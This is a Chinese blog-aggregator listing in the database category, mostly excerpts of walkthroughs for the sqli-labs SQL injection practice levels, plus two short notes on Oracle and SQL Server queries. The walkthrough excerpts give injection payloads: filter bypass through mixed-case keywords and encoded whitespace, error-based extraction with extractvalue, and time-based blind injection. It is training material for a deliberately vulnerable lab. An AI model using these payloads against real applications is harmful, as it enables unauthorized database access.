Less-28a 本关与28基本一致,只是过滤条件少了几个。 http://127.0.0.1/sqllib/Less-28a/?id=100%27)unIon%0bsElect%0b1,@@basedir,3||(%271 ...
分类:
数据库 时间:
2016-08-12 00:52:51
阅读次数:
160
Less-28 本关考察内容与27关没有太大的差距,我们直接给出一个payload: http://127.0.0.1/sqllib/Less-28/?id=100')union%a0select(1),(user()),(3)||('1 ...
分类:
数据库 时间:
2016-08-12 00:45:52
阅读次数:
304
Less-27 本关主要考察将union,select和26关过滤掉的字符。此处我们依旧和26关的方式是一样的,只需要将union和select改为大小写混合就可以突破。 示例:127.0.0.1/sqllib/Less-27/?id=100'unIon%a0SelEcT%a01,database( ...
分类:
数据库 时间:
2016-08-12 00:43:00
阅读次数:
413
Oracle高级查询1集合运算union并集把两张表合成一张表intersect交集一样的留下,不一样的不要minus减去前面的结果减去后面的结果createtableemp3as
select*fromemp2wheredeptno=20;
createtableemp4as
select*fromemp2wheredeptno=30;
altertableemp3renametoemp20;
altertabl..
分类:
数据库 时间:
2016-08-11 23:22:52
阅读次数:
240
Less-60 与上述一致,同样给出一个示例payload: http://127.0.0.1/sqli-labs/Less-60/?id=-1")union select extractvalue(1,concat(0x7e,(select group_concat(table_name) fro ...
分类:
数据库 时间:
2016-08-11 22:42:22
阅读次数:
188
Less-61 此处对于id处理还是有点奇葩的,第一次遇到利用两层括号的。(可能我头发比较长,见识短了)。形式和上述是一样的 payload: http://127.0.0.1/sqli-labs/Less-61/?id=-1'))union select extractvalue(1,concat... ...
分类:
数据库 时间:
2016-08-11 22:38:35
阅读次数:
217
此处union和报错注入都已经失效了,那我们就要使用延时注入了,此处给出一个示例 payload: http://127.0.0.1/sqli-labs/Less-62/?id=1%27)and%20If(ascii(substr((select%20group_concat(table_name) ...
分类:
数据库 时间:
2016-08-11 22:34:06
阅读次数:
191
今天女票问我SqlServer的四种排序,当场写了几句Sql让她了解,现把相关Sql放上来。 首先,我们创建一些测试数据。 最后一个union用union all,因为我们多一行"张三"。 一、ROW_NUMBER() over(partition by columnname order by co ...
分类:
数据库 时间:
2016-08-11 22:31:27
阅读次数:
354
Less-57 从代码中看到对id进行了 " " 的处理,所以此处我们构造的payload要进行 "" 的处理,示例payload: http://127.0.0.1/sqli-labs/Less-57/index.php?id=-1"union select 1,2,group_concat(ta... ...
分类:
数据库 时间:
2016-08-11 22:16:38
阅读次数:
211
Less-59 与less58一致,直接给出一个示例payload: http://127.0.0.1/sqli-labs/Less-59/?id=-1 union select extractvalue(1,concat(0x7e,(select group_concat(table_name) ... ...
分类:
数据库 时间:
2016-08-11 22:15:45
阅读次数:
205
